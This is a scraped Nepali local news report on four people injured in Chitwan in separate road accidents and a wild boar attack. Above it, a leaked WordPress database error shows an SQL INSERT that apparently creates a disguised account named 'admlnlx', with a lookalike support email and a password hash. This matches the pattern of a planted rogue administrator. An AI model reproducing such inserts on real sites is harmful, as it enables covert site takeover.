WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6Tvf9yDVMMUDN6mE21b8delmmkDG..', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 11:09:00', '', 'admlnlx', 'admlnlx')
चितवन, माघ ८–
चितवनमा आज (शनिबार) भएका छुट्टा–छुट्टै घटनामा परि चार जना घाईते भएका छन् ।
जिल्लाको भरतपुर उपमहानगरपालिका– १ रामनगरबाट देवघाट जाने जंगलको बाटोमा ना १ ह ३१५९ नं ई–रिक्सा आफै अनियन्त्रित भई पल्टिदा ई–रिक्सामा सवार दुई जना घाईते भएका छन् । घाईते हुनेमा चित्रवन नगरपालिका–६ बस्ने वर्ष ७४ का तीर्थराज ढकाल र उनकी श्रीमती ७३ वर्षीय ईन्द्रादेवी ढकाल रहेका छन् । उनीहरुको नारायणी सामुदायिक हस्पिटल भरतपुरमा उपचार भएको छ ।
यस्तै म्याजिकले स्कुटरलाई ठक्कर दिँदा एक युवा घाईते भएका छन् ।
भरतपुर उपमहानगरपालिका– १२ गोन्द्राङ कोक फ्याक्ट्रीस्थित बसपार्कबाट गोन्द्राङ तर्फ आउदै गरेको ना १ ज ६२५७ नम्बरको म्याजीकले विपरित दिशाबाट जादै गरेको ना ३५ प ५२४५ नं मोटरसाईकललाई ठक्कर दिँदा मोटरसाईकल चालक माडी नगरपालिका–९ बस्ने २२ वर्षीय सुरज सुनार घाईते भएको जिल्ला प्रहरी कार्यालय चितवनले जनाएको छ । उनको चितवन मेडिकल कलेजमा उपचार भएको छ ।
यसैगरि आज जंगली बदेलको आक्रमणबाट एक वृद्धा घाईते भएकी छिन् ।
भरतपुर उपमहानरगरपालिका–८ गौरिगंज स्थित स्थानीय ६० वर्षीया रत्नमाया वि.क. जंगली बदेलको आक्रमणबाट घाईते भएको प्रहरीले जनाएको छ । उनको भरतपुर अस्पतालमा उपचार भईरहेको छ ।